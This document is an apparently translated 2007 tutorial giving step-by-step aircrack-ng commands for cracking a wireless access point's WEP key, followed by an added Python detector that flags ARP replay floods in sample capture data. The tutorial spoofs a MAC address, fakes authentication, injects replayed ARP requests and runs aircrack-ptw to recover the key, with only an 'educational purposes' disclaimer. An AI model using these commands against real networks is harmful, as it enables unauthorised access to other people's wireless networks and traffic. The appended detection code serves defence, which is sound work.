wireless card. Hopefully you understand it. If you are from Germany read this:
Tutorial – hack WEP with Wifiway (3945abg)
Console 1:
echo CHANNEL > /sys/class/net/wifi0/device/channel
- Replace CHANNEL with the channel the AP is sending on.
airodump-ng rtap0
press Ctrl+C to cancel
Console 2:
ifconfig wifi0 down
( macchanger -m FF:FF:FF:FF:FF:FF wifi0 )
echo BSSID > /sys/class/net/wifi0/device/bssid
- the BSSID is the MAC of an AP.
echo 2 > /sys/class/net/wifi0/device/rate
- the ‘2’ sets the rate to 2 Mb/s (if you are close to the AP, set it to 12)
ifconfig wifi0 up
Console 1:
airodump-ng -c CHANNEL -w FILE rtap0
- FILE: the file where the captured packets are saved.
Console 2:
macchanger -s wifi0
aireplay-ng -1 10 -a BSSID -e ESSID -h EURE_MAC wifi0
- BSSID = AP’s MAC
- ESSID = Name of the AP
- EURE_MAC = your MAC, see above
Console 3:
aireplay-ng -3 -b BSSID -e ESSID -h EURE_MAC wifi0
- I think you know what the abbreviations mean.
When you have 100,000 or more, start aircrack-ptw (sometimes 50,000 is also enough).
Console 4:
aircrack-ptw FILE-01.cap
- If aircrack-ptw is successful, it will show you the hex key
What you need:
- Wifiway 1.0 Beta2 (www.wifiway.org) - not final, there are some changes!
- Intel® PRO/Wireless 3945ABG Network Connection
Meaning of the abbreviations:
AP – Access Point
BSSID: MAC address of the Access Point
ESSID: name of the Access Point
MAC: MAC address of the network adapter
Channel: Channel, on which the Access Point is sending
WARNING: This information is for educational purposes only!
Use it at your own risk.
©2007 by cosypanther
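
Added example, not part of the original tutorial: the aireplay-ng -3 step is an ARP request replay, which appears in a capture as one station resending the same-sized broadcast data frame far faster than a normal client does, so a monitoring sensor can flag it. The frame tuple layout, the thresholds, and all sample MACs and lengths below are constructed assumptions.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def find_replay_floods(frames, window=1.0, min_frames=100):
    """Flag stations that repeat one broadcast frame size at a high rate.

    frames: iterable of (timestamp_s, src_mac, bssid, dst_mac, length),
    an assumed layout for records exported from a monitoring capture.
    Returns alerts sorted by peak frames seen inside any `window` seconds.
    """
    buckets = defaultdict(list)
    for ts, src, bssid, dst, length in frames:
        if dst.lower() == BROADCAST:
            buckets[(src.lower(), bssid.lower(), length)].append(ts)

    alerts = []
    for (src, bssid, length), stamps in buckets.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans <= `window` seconds.
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_frames:
            alerts.append({"src": src, "bssid": bssid,
                           "length": length, "peak": peak})
    return sorted(alerts, key=lambda a: -a["peak"])

def sample_frames():
    """Constructed capture: one ordinary client and one replaying station."""
    ap = "00:11:22:33:44:55"
    frames = []
    # Ordinary client: a broadcast ARP every 30 s plus mixed-size unicast data.
    for i in range(10):
        frames.append((i * 30.0, "aa:aa:aa:00:00:01", ap, BROADCAST, 68))
    for i in range(200):
        frames.append((i * 0.5, "aa:aa:aa:00:00:01", ap, ap, 100 + (i % 40) * 30))
    # Replaying station: the same 68-byte broadcast frame every 2 ms for 4 s.
    for i in range(2000):
        frames.append((50.0 + i * 0.002, "aa:aa:aa:00:00:02", ap, BROADCAST, 68))
    return frames

if __name__ == "__main__":
    for alert in find_replay_floods(sample_frames()):
        print(alert)
```

Tune window and min_frames against a baseline of the network's own broadcast traffic before alerting on them.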